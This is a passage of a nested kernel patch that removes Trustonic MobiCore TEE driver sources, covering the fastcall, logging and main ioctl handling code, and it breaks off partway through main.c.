--	case CPU_DEAD:
--	case CPU_DEAD_FROZEN:
--		dev_info(g_ctx.mcd, "Cpu %u is dead\n", cpu);
--		break;
--	}
--	return NOTIFY_OK;
--}
--
--static struct notifier_block mobicore_cpu_notifer = {
--	.notifier_call = mobicore_cpu_callback,
--};
--#endif /* MC_FASTCALL_WORKER_THREAD */
--
--static cpumask_t mc_exec_core_switch(union mc_fc_generic *mc_fc_generic)
--{
--	cpumask_t cpu;
--	uint32_t new_cpu;
--	uint32_t cpu_id[] = CPU_IDS;
--
--	new_cpu = mc_fc_generic->as_in.param[0];
--	mc_fc_generic->as_in.param[0] = cpu_id[mc_fc_generic->as_in.param[0]];
--
--	if (_smc(mc_fc_generic) != 0 || mc_fc_generic->as_out.ret != 0) {
--		MCDRV_DBG("CoreSwap failed %d -> %d (cpu %d still active)\n",
--			  raw_smp_processor_id(),
--			  mc_fc_generic->as_in.param[0],
--			  raw_smp_processor_id());
--	} else {
--		active_cpu = new_cpu;
--		MCDRV_DBG("CoreSwap ok %d -> %d\n",
--			  raw_smp_processor_id(), active_cpu);
--	}
--	cpumask_clear(&cpu);
--	cpumask_set_cpu(active_cpu, &cpu);
--	return cpu;
--}
--#else /* TBASE_CORE_SWITCHER */
--static inline cpumask_t mc_exec_core_switch(union mc_fc_generic *mc_fc_generic)
--{
--	return CPU_MASK_CPU0;
--}
--#endif /* !TBASE_CORE_SWITCHER */
--
--#ifdef MC_FASTCALL_WORKER_THREAD
--static void fastcall_work_func(struct kthread_work *work)
--#else
--static void fastcall_work_func(struct work_struct *work)
--#endif
--{
--	struct fastcall_work *fc_work =
--		container_of(work, struct fastcall_work, work);
--	union mc_fc_generic *mc_fc_generic = fc_work->data;
--
--	if (!mc_fc_generic)
--		return;
--
--	mc_clock_enable();
--
--	if (mc_fc_generic->as_in.cmd == MC_FC_SWAP_CPU) {
--#ifdef MC_FASTCALL_WORKER_THREAD
--		cpumask_t new_msk = mc_exec_core_switch(mc_fc_generic);
--
--		set_cpus_allowed(fastcall_thread, new_msk);
--#else
--		mc_exec_core_switch(mc_fc_generic);
--#endif
--	} else {
--		_smc(mc_fc_generic);
--	}
--
--	mc_clock_disable();
--}
--
--static bool mc_fastcall(void *data)
--{
--#ifdef MC_FASTCALL_WORKER_THREAD
--	struct fastcall_work fc_work = {
--		KTHREAD_WORK_INIT(fc_work.work, fastcall_work_func),
--		.data = data,
--	};
--
--	if (!queue_kthread_work(&fastcall_worker, &fc_work.work))
--		return false;
--
--	/* If work is queued or executing, wait for it to finish execution */
--	flush_kthread_work(&fc_work.work);
--#else
--	struct fastcall_work fc_work = {
--		.data = data,
--	};
--
--	INIT_WORK_ONSTACK(&fc_work.work, fastcall_work_func);
--
--	if (!schedule_work_on(0, &fc_work.work))
--		return false;
--
--	flush_work(&fc_work.work);
--#endif
--	return true;
--}
--
--int mc_fastcall_init(void)
--{
--	int ret = mc_clock_init();
--
--	if (ret)
--		return ret;
--
--#ifdef MC_FASTCALL_WORKER_THREAD
--	fastcall_thread = kthread_create(kthread_worker_fn, &fastcall_worker,
--					 "mc_fastcall");
--	if (IS_ERR(fastcall_thread)) {
--		ret = PTR_ERR(fastcall_thread);
--		fastcall_thread = NULL;
--		MCDRV_ERROR("cannot create fastcall wq (%d)", ret);
--		return ret;
--	}
--
--	/* this thread MUST run on CPU 0 at startup */
--	set_cpus_allowed(fastcall_thread, CPU_MASK_CPU0);
--
--	wake_up_process(fastcall_thread);
--#ifdef TBASE_CORE_SWITCHER
--	ret = register_cpu_notifier(&mobicore_cpu_notifer);
--#endif
--#endif /* MC_FASTCALL_WORKER_THREAD */
--	return ret;
--}
--
--void mc_fastcall_exit(void)
--{
--#ifdef MC_FASTCALL_WORKER_THREAD
--	if (!IS_ERR_OR_NULL(fastcall_thread)) {
--#ifdef TBASE_CORE_SWITCHER
--		unregister_cpu_notifier(&mobicore_cpu_notifer);
--#endif
--		kthread_stop(fastcall_thread);
--		fastcall_thread = NULL;
--	}
--#endif /* MC_FASTCALL_WORKER_THREAD */
--	mc_clock_exit();
--}
--
--/*
-- * convert fast call return code to linux driver module error code
-- */
--static int convert_fc_ret(uint32_t ret)
--{
--	switch (ret) {
--	case MC_FC_RET_OK:
--		return 0;
--	case MC_FC_RET_ERR_INVALID:
--		return -EINVAL;
--	case MC_FC_RET_ERR_ALREADY_INITIALIZED:
--		return -EBUSY;
--	default:
--		return -EFAULT;
--	}
--}
--
--int mc_fc_init(uintptr_t base_pa, ptrdiff_t off, size_t q_len, size_t buf_len)
--{
--#ifdef CONFIG_ARM64
--	uint32_t base_high = (uint32_t)(base_pa >> 32);
--#else
--	uint32_t base_high = 0;
--#endif
--	union mc_fc_init fc_init;
--
--	/* Call the INIT fastcall to setup MobiCore initialization */
--	memset(&fc_init, 0, sizeof(fc_init));
--	fc_init.as_in.cmd = MC_FC_INIT;
--	/* base address of mci buffer PAGE_SIZE (default is 4KB) aligned */
--	fc_init.as_in.base = (uint32_t)base_pa;
--	/* notification buffer start/length [16:16] [start, length] */
--	fc_init.as_in.nq_info =
--	    ((base_high & 0xFFFF) << 16) | (q_len & 0xFFFF);
--	/* mcp buffer start/length [16:16] [start, length] */
--	fc_init.as_in.mcp_info = (off << 16) | (buf_len & 0xFFFF);
--	MCDRV_DBG("cmd=0x%08x, base=0x%08x,nq_info=0x%08x, mcp_info=0x%08x",
--		  fc_init.as_in.cmd, fc_init.as_in.base, fc_init.as_in.nq_info,
--		  fc_init.as_in.mcp_info);
--	mc_fastcall(&fc_init.as_generic);
--	MCDRV_DBG("out cmd=0x%08x, ret=0x%08x", fc_init.as_out.resp,
--		  fc_init.as_out.ret);
--	return convert_fc_ret(fc_init.as_out.ret);
--}
--
--int mc_fc_info(uint32_t ext_info_id, uint32_t *state, uint32_t *ext_info)
--{
--	union mc_fc_info fc_info;
--	int ret = 0;
--
--	memset(&fc_info, 0, sizeof(fc_info));
--	fc_info.as_in.cmd = MC_FC_INFO;
--	fc_info.as_in.ext_info_id = ext_info_id;
--	mc_fastcall(&fc_info.as_generic);
--	ret = convert_fc_ret(fc_info.as_out.ret);
--	if (ret) {
--		if (state)
--			*state = MC_STATUS_NOT_INITIALIZED;
--
--		if (ext_info)
--			*ext_info = 0;
--
--		MCDRV_ERROR("code %d for idx %d", ret, ext_info_id);
--	} else {
--		if (state)
--			*state = fc_info.as_out.state;
--
--		if (ext_info)
--			*ext_info = fc_info.as_out.ext_info;
--	}
--
--	return ret;
--}
--
--int mc_fc_mem_trace(phys_addr_t buffer, uint32_t size)
--{
--	union mc_fc_generic mc_fc_generic;
--
--	memset(&mc_fc_generic, 0, sizeof(mc_fc_generic));
--	mc_fc_generic.as_in.cmd = MC_FC_MEM_TRACE;
--	mc_fc_generic.as_in.param[0] = (uint32_t)buffer;
--#ifdef CONFIG_ARM64
--	mc_fc_generic.as_in.param[1] = (uint32_t)(buffer >> 32);
--#endif
--	mc_fc_generic.as_in.param[2] = size;
--	mc_fastcall(&mc_fc_generic);
--	return convert_fc_ret(mc_fc_generic.as_out.ret);
--}
--
--int mc_fc_nsiq(void)
--{
--	union mc_fc_generic fc;
--	int ret;
--
--	memset(&fc, 0, sizeof(fc));
--	fc.as_in.cmd = MC_SMC_N_SIQ;
--	mc_fastcall(&fc);
--	ret = convert_fc_ret(fc.as_out.ret);
--	if (ret)
--		MCDRV_ERROR("failed: %d", ret);
--
--	return ret;
--}
--
--int mc_fc_yield(void)
--{
--	union mc_fc_generic fc;
--	int ret;
--
--	memset(&fc, 0, sizeof(fc));
--	fc.as_in.cmd = MC_SMC_N_YIELD;
--	mc_fastcall(&fc);
--	ret = convert_fc_ret(fc.as_out.ret);
--	if (ret)
--		MCDRV_ERROR("failed: %d", ret);
--
--	return ret;
--}
--
--#ifdef TBASE_CORE_SWITCHER
--uint32_t mc_active_core(void)
--{
--	return active_cpu;
--}
--
--int mc_switch_core(uint32_t core_num)
--{
--	int32_t ret = 0;
--	union mc_fc_swich_core fc_switch_core;
--
--	if (!cpu_online(core_num))
--		return 1;
--
--	MCDRV_DBG_VERBOSE("enter\n");
--	memset(&fc_switch_core, 0, sizeof(fc_switch_core));
--	fc_switch_core.as_in.cmd = MC_FC_SWAP_CPU;
--	if (core_num < COUNT_OF_CPUS)
--		fc_switch_core.as_in.core_id = core_num;
--	else
--		fc_switch_core.as_in.core_id = 0;
--
--	MCDRV_DBG("<- cmd=0x%08x, core_id=0x%08x\n",
--		  fc_switch_core.as_in.cmd, fc_switch_core.as_in.core_id);
--	MCDRV_DBG("<- core_num=0x%08x, active_cpu=0x%08x\n",
--		  core_num, active_cpu);
--	mc_fastcall(&fc_switch_core.as_generic);
--	ret = convert_fc_ret(fc_switch_core.as_out.ret);
--	MCDRV_DBG_VERBOSE("exit with %d/0x%08X\n", ret, ret);
--	return ret;
--}
--#endif
-diff --git a/drivers/gud/MobiCoreDriver/fastcall.h b/drivers/gud/MobiCoreDriver/fastcall.h
-deleted file mode 100644
-index b19b27687ff38..0000000000000
---- a/drivers/gud/MobiCoreDriver/fastcall.h
-+++ /dev/null
-@@ -1,38 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#ifndef _TBASE_FASTCALL_H_
--#define _TBASE_FASTCALL_H_
--
--/* Use the arch_extension sec pseudo op before switching to secure world */
--#if defined(__GNUC__) && \
--	defined(__GNUC_MINOR__) && \
--	defined(__GNUC_PATCHLEVEL__) && \
--	((__GNUC__ * 10000 + __GNUC_MINOR__ * 100 + __GNUC_PATCHLEVEL__)) \
--	>= 40502
--#ifndef CONFIG_ARM64
--#define MC_ARCH_EXTENSION_SEC
--#endif
--#endif
--
--int mc_fc_init(uintptr_t base_pa, ptrdiff_t off, size_t q_len, size_t buf_len);
--int mc_fc_info(uint32_t ext_info_id, uint32_t *state, uint32_t *ext_info);
--int mc_fc_mem_trace(phys_addr_t buffer, uint32_t size);
--int mc_fc_nsiq(void);
--int mc_fc_yield(void);
--
--int mc_fastcall_init(void);
--void mc_fastcall_exit(void);
--
--#endif /* _TBASE_FASTCALL_H_ */
-diff --git a/drivers/gud/MobiCoreDriver/logging.c b/drivers/gud/MobiCoreDriver/logging.c
-deleted file mode 100644
-index 953de5f149f78..0000000000000
---- a/drivers/gud/MobiCoreDriver/logging.c
-+++ /dev/null
-@@ -1,251 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#include <linux/workqueue.h>
--#include <linux/slab.h>
--#include <linux/device.h>
--
--#include "fastcall.h"
--#include "main.h"
--#include "logging.h"
--
--#ifndef CONFIG_TRUSTONIC_TEE_NO_TRACES
--
--/* Supported log buffer version */
--#define MC_LOG_VERSION			2
--
--/* Default length of the log ring buffer 256KiB */
--#define LOG_BUF_ORDER			6
--
--/* Max Len of a log line for printing */
--#define LOG_LINE_SIZE			256
--
--/* Definitions for log version 2 */
--#define LOG_TYPE_MASK			(0x0007)
--#define LOG_TYPE_CHAR			0
--#define LOG_TYPE_INTEGER		1
--
--/* Field length */
--#define LOG_LENGTH_MASK			(0x00F8)
--#define LOG_LENGTH_SHIFT		3
--
--/* Extra attributes */
--#define LOG_EOL				(0x0100)
--#define LOG_INTEGER_DECIMAL		(0x0200)
--#define LOG_INTEGER_SIGNED		(0x0400)
--
--struct mc_logmsg {
--	uint16_t ctrl;		/* Type and format of data */
--	uint16_t source;	/* Unique value for each event source */
--	uint32_t log_data;	/* Value, if any */
--};
--
--/* MobiCore internal trace buffer structure. */
--struct mc_trace_buf {
--	uint32_t version;	/* version of trace buffer */
--	uint32_t length;	/* length of buff */
--	uint32_t head;		/* last write position */
--	uint8_t buff[];		/* start of the log buffer */
--};
--
--static struct logging_ctx {
--	struct work_struct work;
--	union {
--		struct mc_trace_buf *trace_buf;	/* Circular log buffer */
--		unsigned long trace_page;
--	};
--	bool buffer_is_shared;		/* Log buffer cannot be freed */
--	uint32_t tail;			/* MobiCore log read position */
--	uint32_t line_len;		/* Log Line buffer current length */
--	int thread_err;
--	uint16_t prev_source;		/* Previous Log source */
--	char line[LOG_LINE_SIZE];	/* Log Line buffer */
--	bool dead;
--} log_ctx;
--
--static inline void log_eol(uint16_t source)
--{
--	if (!strnlen(log_ctx.line, LOG_LINE_SIZE)) {
--		/* In case a TA tries to print a 0x0 */
--		log_ctx.line_len = 0;
--		return;
--	}
--
--	if (log_ctx.prev_source)
--		/* MobiCore Userspace */
--		dev_info(g_ctx.mcd, "%03x|%s\n", log_ctx.prev_source,
--			 log_ctx.line);
--	else
--		/* MobiCore kernel */
--		dev_info(g_ctx.mcd, "%s\n", log_ctx.line);
--
--	log_ctx.line_len = 0;
--	log_ctx.line[0] = 0;
--}
--
--/*
-- * Collect chars in log_ctx.line buffer and output the buffer when it is full.
-- * No locking needed because only "mobicore_log" thread updates this buffer.
-- */
--static inline void log_char(char ch, uint16_t source)
--{
--	if (ch == '\n' || ch == '\r') {
--		log_eol(source);
--		return;
--	}
--
--	if ((log_ctx.line_len >= (LOG_LINE_SIZE - 1)) ||
--	    (source != log_ctx.prev_source))
--		log_eol(source);
--
--	log_ctx.line[log_ctx.line_len++] = ch;
--	log_ctx.line[log_ctx.line_len] = 0;
--	log_ctx.prev_source = source;
--}
--
--static inline void log_string(uint32_t ch, uint16_t source)
--{
--	while (ch) {
--		log_char(ch & 0xFF, source);
--		ch >>= 8;
--	}
--}
--
--static inline void log_number(uint32_t format, uint32_t value, uint16_t source)
--{
--	int width = (format & LOG_LENGTH_MASK) >> LOG_LENGTH_SHIFT;
--	char fmt[16];
--	char buffer[32];
--	const char *reader = buffer;
--
--	if (format & LOG_INTEGER_DECIMAL)
--		if (format & LOG_INTEGER_SIGNED)
--			snprintf(fmt, sizeof(fmt), "%%%ud", width);
--		else
--			snprintf(fmt, sizeof(fmt), "%%%uu", width);
--	else
--		snprintf(fmt, sizeof(fmt), "%%0%ux", width);
--
--	snprintf(buffer, sizeof(buffer), fmt, value);
--	while (*reader)
--		log_char(*reader++, source);
--}
--
--static inline int log_msg(void *data)
--{
--	struct mc_logmsg *msg = (struct mc_logmsg *)data;
--	int log_type = msg->ctrl & LOG_TYPE_MASK;
--
--	switch (log_type) {
--	case LOG_TYPE_CHAR:
--		log_string(msg->log_data, msg->source);
--		break;
--	case LOG_TYPE_INTEGER:
--		log_number(msg->ctrl, msg->log_data, msg->source);
--		break;
--	}
--	if (msg->ctrl & LOG_EOL)
--		log_eol(msg->source);
--
--	return sizeof(*msg);
--}
--
--static void log_worker(struct work_struct *work)
--{
--	while (log_ctx.trace_buf->head != log_ctx.tail) {
--		if (log_ctx.trace_buf->version != MC_LOG_VERSION) {
--			dev_err(g_ctx.mcd,
--				"Bad log data v%d (exp. v%d), stop.\n",
--				log_ctx.trace_buf->version,
--				MC_LOG_VERSION);
--			log_ctx.dead = true;
--			break;
--		}
--
--		log_ctx.tail += log_msg(&log_ctx.trace_buf->buff[log_ctx.tail]);
--		/* Wrap over if no space left for a complete message */
--		if ((log_ctx.tail + sizeof(struct mc_logmsg)) >
--						log_ctx.trace_buf->length)
--			log_ctx.tail = 0;
--	}
--}
--
--/*
-- * Wake up the log reader thread
-- * This should be called from the places where calls into MobiCore have
-- * generated some logs(eg, yield, SIQ...)
-- */
--void mc_logging_run(void)
--{
--	if (!log_ctx.dead && (log_ctx.trace_buf->head != log_ctx.tail))
--		schedule_work(&log_ctx.work);
--}
--
--int mc_logging_start(void)
--{
--	int ret = mc_fc_mem_trace(virt_to_phys((void *)(log_ctx.trace_page)),
--				  BIT(LOG_BUF_ORDER) * PAGE_SIZE);
--
--	if (ret) {
--		dev_err(g_ctx.mcd, "shared traces setup failed\n");
--		return ret;
--	}
--
--	log_ctx.buffer_is_shared = true;
--	dev_dbg(g_ctx.mcd, "fc_log version %u\n", log_ctx.trace_buf->version);
--	mc_logging_run();
--	return 0;
--}
--
--void mc_logging_stop(void)
--{
--	if (!mc_fc_mem_trace(0, 0))
--		log_ctx.buffer_is_shared = false;
--
--	mc_logging_run();
--	flush_work(&log_ctx.work);
--}
--
--/*
-- * Setup MobiCore kernel log. It assumes it's running on CORE 0!
-- * The fastcall will complain is that is not the case!
-- */
--int mc_logging_init(void)
--{
--	/*
--	 * We are going to map this buffer into virtual address space in SWd.
--	 * To reduce complexity there, we use a contiguous buffer.
--	 */
--	log_ctx.trace_page = __get_free_pages(GFP_KERNEL | __GFP_ZERO,
--					      LOG_BUF_ORDER);
--	if (!log_ctx.trace_page)
--		return -ENOMEM;
--
--	INIT_WORK(&log_ctx.work, log_worker);
--	return 0;
--}
--
--void mc_logging_exit(void)
--{
--	/*
--	 * This is not racey as the only caller for mc_logging_run is the
--	 * scheduler which gets stopped before us, and long before we exit.
--	 */
--	if (!log_ctx.buffer_is_shared)
--		free_pages(log_ctx.trace_page, LOG_BUF_ORDER);
--	else
--		dev_err(g_ctx.mcd, "log buffer unregister not supported\n");
--}
--
--#endif /* !CONFIG_TRUSTONIC_TEE_NO_TRACES */
-diff --git a/drivers/gud/MobiCoreDriver/logging.h b/drivers/gud/MobiCoreDriver/logging.h
-deleted file mode 100644
-index 744b41880ea31..0000000000000
---- a/drivers/gud/MobiCoreDriver/logging.h
-+++ /dev/null
-@@ -1,51 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--#ifndef _MC_LOGGING_H_
--#define _MC_LOGGING_H_
--
--#include "platform.h"	/* CONFIG_TRUSTONIC_TEE_NO_TRACES */
--
--/* MobiCore internal trace log setup. */
--#ifndef CONFIG_TRUSTONIC_TEE_NO_TRACES
--void mc_logging_run(void);
--int  mc_logging_init(void);
--void mc_logging_exit(void);
--int mc_logging_start(void);
--void mc_logging_stop(void);
--#else /* !CONFIG_TRUSTONIC_TEE_NO_TRACES */
--static inline void mc_logging_run(void)
--{
--}
--
--static inline long mc_logging_init(void)
--{
--	return 0;
--}
--
--static inline void mc_logging_exit(void)
--{
--}
--
--static inline int mc_logging_start(void)
--{
--	return 0;
--}
--
--static inline void mc_logging_stop(void)
--{
--}
--
--#endif /* CONFIG_TRUSTONIC_TEE_NO_TRACES */
--
--#endif /* _MC_LOGGING_H_ */
-diff --git a/drivers/gud/MobiCoreDriver/main.c b/drivers/gud/MobiCoreDriver/main.c
-deleted file mode 100644
-index 66b232e5bc8b5..0000000000000
---- a/drivers/gud/MobiCoreDriver/main.c
-+++ /dev/null
-@@ -1,750 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--#include <asm/pgtable.h>
--
--#include <linux/highmem.h>
--#include <linux/slab.h>
--#include <linux/kthread.h>
--#include <linux/platform_device.h>
--#include <linux/module.h>
--#include <linux/ioctl.h>
--#include <linux/mm.h>
--#include <linux/mman.h>
--#include <linux/mutex.h>
--#include <linux/cdev.h>
--#include <linux/stat.h>
--#include <linux/debugfs.h>
--
--#include "public/mc_linux.h"
--
--#include "main.h"
--#include "fastcall.h"
--#include "arm.h"
--#include "mmu.h"
--#include "scheduler.h"
--#include "pm.h"
--#include "debug.h"
--#include "logging.h"
--#include "admin.h"
--#include "mcp.h"
--#include "session.h"
--#include "client.h"
--#include "api.h"
--
--#include "build_tag.h"
--
--/* Define a MobiCore device structure for use with dev_debug() etc */
--static struct device_driver driver = {
--	.name = "Trustonic"
--};
--
--static struct device device = {
--	.driver = &driver
--};
--
--struct mc_device_ctx g_ctx = {
--	.mcd = &device
--};
--
--/* device admin */
--static dev_t mc_dev_admin;
--/* device user */
--static dev_t mc_dev_user;
--
--/* Need to discover a chrdev region for the driver */
--static struct cdev mc_user_cdev;
--/* Device class for the driver assigned major */
--static struct class *mc_device_class;
--
--/*
-- * Get client object from file pointer
-- */
--static inline struct tbase_client *get_client(struct file *file)
--{
--	return (struct tbase_client *)file->private_data;
--}
--
--/*
-- * Callback for system mmap()
-- */
--static int mc_fd_user_mmap(struct file *file, struct vm_area_struct *vmarea)
--{
--	struct tbase_client *client = get_client(file);
--	uint32_t len = (uint32_t)(vmarea->vm_end - vmarea->vm_start);
--
--	/* Alloc contiguous buffer for this client */
--	return api_malloc_cbuf(client, len, NULL, vmarea);
--}
--
--/*
-- * Check r/w access to referenced memory
-- */
--static inline int ioctl_check_pointer(unsigned int cmd, int __user *uarg)
--{
--	int err = 0;
--
--	if (_IOC_DIR(cmd) & _IOC_READ)
--		err = !access_ok(VERIFY_WRITE, uarg, _IOC_SIZE(cmd));
--	else if (_IOC_DIR(cmd) & _IOC_WRITE)
--		err = !access_ok(VERIFY_READ, uarg, _IOC_SIZE(cmd));
--
--	if (err)
--		return -EFAULT;
--
--	return 0;
--}
--
--/*
-- * Callback for system ioctl()
-- * Implement most of ClientLib API functions
-- * @file	pointer to file
-- * @cmd		command
-- * @arg		arguments
-- *
-- * Returns 0 for OK and an errno in case of error
-- */
--static long mc_fd_user_ioctl(struct file *file, unsigned int id,
--			     unsigned long arg)
--{
--	struct tbase_client *client = get_client(file);
--	int __user *uarg = (int __user *)arg;
--	int ret = -EINVAL;
--
--	MCDRV_DBG("%u from %s", _IOC_NR(id), current->comm);
--
--	if (WARN(!client, "No client data available"))
--		return -EPROTO;
--
--	if (ioctl_check_pointer(id, uarg))
--		return -EFAULT;
--
--	switch (id) {
--	case MC_IO_FREEZE:
--		/* Freeze the client */
--		ret = api_freeze_device(client);
--		break;
--
--	case MC_IO_OPEN_SESSION: {
--		struct mc_ioctl_open_sess sess;
--
--		if (copy_from_user(&sess, uarg, sizeof(sess))) {
--			ret = -EFAULT;
--			break;
--		}
--
--		ret = api_open_session(client, &sess.sid, &sess.uuid, sess.tci,
--				       sess.tcilen, sess.is_gp_uuid,
--				       &sess.identity);
--		if (ret)
--			break;
--
--		if (copy_to_user(uarg, &sess, sizeof(sess))) {
--			ret = -EFAULT;
--			api_close_session(client, sess.sid);
--			break;
--		}
--		break;
--	}
--	case MC_IO_OPEN_TRUSTLET: {
--		struct mc_ioctl_open_trustlet ta_desc;
--
--		if (copy_from_user(&ta_desc, uarg, sizeof(ta_desc))) {
--			ret = -EFAULT;
--			break;
--		}
--
--		/* Call internal api */
--		ret = api_open_trustlet(client, &ta_desc.sid, ta_desc.spid,
--					ta_desc.buffer, ta_desc.tlen,
--					ta_desc.tci, ta_desc.tcilen);
--		if (ret)
--			break;
--
--		if (copy_to_user(uarg, &ta_desc, sizeof(ta_desc))) {
--			ret = -EFAULT;
--			api_close_session(client, ta_desc.sid);
--			break;
--		}
--		break;
--	}
--	case MC_IO_CLOSE_SESSION: {
--		uint32_t sid = (uint32_t)arg;
--
--		ret = api_close_session(client, sid);
--		break;
--	}
--	case MC_IO_NOTIFY: {
--		uint32_t sid = (uint32_t)arg;
--
--		ret = api_notify(client, sid);
--		break;
--	}
--	case MC_IO_WAIT: {
--		struct mc_ioctl_wait wait;
--
--		if (copy_from_user(&wait, uarg, sizeof(wait))) {
--			ret = -EFAULT;
--			break;
--		}
--		ret = api_wait_notification(client, wait.sid, wait.timeout);
--		break;
--	}
--	case MC_IO_MAP: {
--		struct mc_ioctl_map map;
--
--		if (copy_from_user(&map, uarg, sizeof(map))) {
--			ret = -EFAULT;
--			break;
--		}
--		ret = api_map_wsms(client, map.sid, map.bufs);
--		if (ret)
--			break;
--
--		/* Fill in return struct */
--		if (copy_to_user(uarg, &map, sizeof(map))) {
--			ret = -EFAULT;
--			api_unmap_wsms(client, map.sid, map.bufs);
--			break;
--		}
--		break;
--	}
--	case MC_IO_UNMAP: {
--		struct mc_ioctl_map map;
--
--		if (copy_from_user(&map, uarg, sizeof(map))) {
--			ret = -EFAULT;
--			break;
--		}
--
--		ret = api_unmap_wsms(client, map.sid, map.bufs);
--		break;
--	}
--	case MC_IO_ERR: {
--		struct mc_ioctl_geterr *uerr = (struct mc_ioctl_geterr *)uarg;
--		uint32_t sid;
--		int32_t exit_code;
--
--		if (get_user(sid, &uerr->sid)) {
--			ret = -EFAULT;
--			break;
--		}
--
--		ret = api_get_session_exitcode(client, sid, &exit_code);
--		if (ret)
--			break;
--
--		/* Fill in return struct */
--		if (put_user(exit_code, &uerr->value)) {
--			ret = -EFAULT;
--			break;
--		}
--
--		break;
--	}
--	case MC_IO_VERSION: {
--		struct mc_version_info version_info;
--
--		ret = mcp_get_version(&version_info);
--		if (ret)
--			break;
--
--		if (copy_to_user(uarg, &version_info, sizeof(version_info)))
--			ret = -EFAULT;
--
--		break;
--	}
--	case MC_IO_DR_VERSION: {
--		uint32_t version = MC_VERSION(MCDRVMODULEAPI_VERSION_MAJOR,
--					      MCDRVMODULEAPI_VERSION_MINOR);
--
--		ret = put_user(version, uarg);
--		break;
--	}
--	default:
--		MCDRV_ERROR("unsupported cmd=0x%x", id);
--		ret = -ENOIOCTLCMD;
--	}
--
--	return ret;
--}
--
--/*
-- * Callback for system open()
-- * A set of internal client data are created and initialized.
-- *
-- * @inode
-- * @file
-- * Returns 0 if OK or -ENOMEM if no allocation was possible.
-- */
--static int mc_fd_user_open(struct inode *inode, struct file *file)
--{
--	struct tbase_client *client;
--
--	MCDRV_DBG("from %s", current->comm);
--
--	/* Create client */
--	client = api_open_device(false);
--	if (!client)
--		return -ENOMEM;
--
--	/* Store client in user file */
--	file->private_data = client;
--	return 0;
--}
--
--/*
-- * Callback for system close()
-- * The client object is freed.
-- * @inode
-- * @file
-- * Returns 0
-- */
--static int mc_fd_user_release(struct inode *inode, struct file *file)
--{
--	struct tbase_client *client = get_client(file);
--
--	MCDRV_DBG("from %s", current->comm);
--
--	if (WARN(!client, "No client data available"))
--		return -EPROTO;
--
--	/* Detach client from user file */
--	file->private_data = NULL;
--
--	/* Destroy client, including remaining sessions */
--	api_close_device(client);
--	return 0;
--}
--
--static const struct file_operations mc_user_fops = {
--	.owner = THIS_MODULE,
--	.open = mc_fd_user_open,
--	.release = mc_fd_user_release,
--	.unlocked_ioctl = mc_fd_user_ioctl,
--#ifdef CONFIG_COMPAT
--	.compat_ioctl = mc_fd_user_ioctl,
--#endif
--	.mmap = mc_fd_user_mmap,
--};
--
--int kasnprintf(struct kasnprintf_buf *buf, const char *fmt, ...)
--{
--	va_list args;
--	int max_size = buf->size - buf->off;
--	int i;
--
--	va_start(args, fmt);
--	i = vsnprintf(buf->buf + buf->off, max_size, fmt, args);
--	if (i >= max_size) {
--		int new_size = PAGE_ALIGN(buf->size + i + 1);
--		char *new_buf = krealloc(buf->buf, new_size, buf->gfp);
--
--		if (!new_buf) {
--			i = -ENOMEM;
--		} else {
--			buf->buf = new_buf;
--			buf->size = new_size;
--			max_size = buf->size - buf->off;
--			i = vsnprintf(buf->buf + buf->off, max_size, fmt, args);
--		}
--	}
--
--	if (i > 0)
--		buf->off += i;
--
--	va_end(args);
--	return i;
--}
--
--static ssize_t debug_info_read(struct file *file, char __user *user_buf,
--			       size_t count, loff_t *ppos)
--{
--	/* Add/update buffer */
--	if (!file->private_data || !*ppos) {
--		struct kasnprintf_buf *buf, *old_buf;
--		int ret;
--
--		buf = kzalloc(GFP_KERNEL, sizeof(*buf));
--		if (!buf)
--			return -ENOMEM;
--
--		buf->gfp = GFP_KERNEL;
--		ret = api_info(buf);
--		if (ret < 0) {
--			kfree(buf);
--			return ret;
--		}
--
--		old_buf = file->private_data;
--		file->private_data = buf;
--		kfree(old_buf);
--	}
--
--	if (file->private_data) {
--		struct kasnprintf_buf *buf = file->private_data;
--
--		return simple_read_from_buffer(user_buf, count, ppos, buf->buf,
--					       buf->off);
--	}
--
--	return 0;
--}
--
--static int debug_info_release(struct inode *inode, struct file *file)
--{
--	kfree(file->private_data);
--	return 0;
--}
--
--static const struct file_operations mc_debug_info_ops = {
--	.read = debug_info_read,
--	.llseek = default_llseek,
--	.release = debug_info_release,
--};
--
--static inline int device_admin_init(int (*tee_start_cb)(void))
--{
--	int ret = 0;
--
--	cdev_init(&mc_user_cdev, &mc_user_fops);
--
--	mc_device_class = class_create(THIS_MODULE, "trustonic_tee");
--	if (IS_ERR(mc_device_class)) {
--		MCDRV_ERROR("failed to create device class");
--		return PTR_ERR(mc_device_class);
--	}
--
--	/* Create the ADMIN node */
--	ret = mc_admin_init(mc_device_class, &mc_dev_admin, tee_start_cb);
--	if (ret < 0) {
--		MCDRV_ERROR("failed to init mobicore device");
--		class_destroy(mc_device_class);
